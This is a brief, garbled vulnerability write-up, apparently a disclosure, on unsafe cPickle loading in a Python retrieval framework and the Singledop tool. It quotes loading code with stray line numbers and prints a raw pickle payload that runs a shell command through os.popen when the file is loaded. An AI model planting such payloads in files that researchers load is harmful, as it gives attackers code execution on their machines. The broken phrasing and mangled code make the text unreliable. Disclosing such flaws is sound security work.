RT Retrieval Framework


or fname in flist: 14 with open(fname) as f: 15 t = cPickle.load(f) 16 xco2_a = t[“XCO2_a”] … 23 with open(“my_cov.pkl”) as f: 24 dist_cov = cPickle.load(f) 25

Remote code execution potential vulnerability in Singledop. Pickle module enables binary serialization and loading of Python datatypes and any user supplied sample file can lead to remote code execution on any researches machine processing a serialized file.

Attack binary a valid DOP file:

mona@mona-virtual-machine:~/Downloads/SingleDop$ cat t_file

Exploit file:

cos popen (S’uname -a’ tRp100 0c__builtin__ getattr (c__builtin__ file S’read’ tRp101 0c__builtin__ apply (g101 (g100 I1000 ltRp102 0c__builtin__ getattr (c__builtin__ file S’close’ tRp103 0c__builtin__ apply (g103 (g100 ltRp104 0g102 .